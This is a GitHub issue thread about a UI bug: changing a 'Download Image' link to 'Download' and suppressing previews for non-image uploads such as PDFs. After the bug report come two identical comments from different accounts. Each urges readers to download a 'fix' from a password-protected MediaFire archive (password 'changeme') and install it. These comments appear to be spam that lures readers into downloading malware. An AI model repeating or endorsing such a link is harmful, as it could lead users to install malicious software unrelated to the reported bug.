### ISSUE TITLE
[BUG] Change "Download Image" to "Download"

### ISSUE THREAD

**Issue by judithweng** [gosqasorg/asset-provenance-tracking#254]
Now that we allow users to upload files other than images, we do not want a "Download Image" link when they have uploaded a pdf. Also, prevent a preview if it is not an image (to avoid having the icon above the link)

![image](https://github.com/user-attachments/assets/7ad314d7-4f56-42ee-a073-ba737ece3353)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
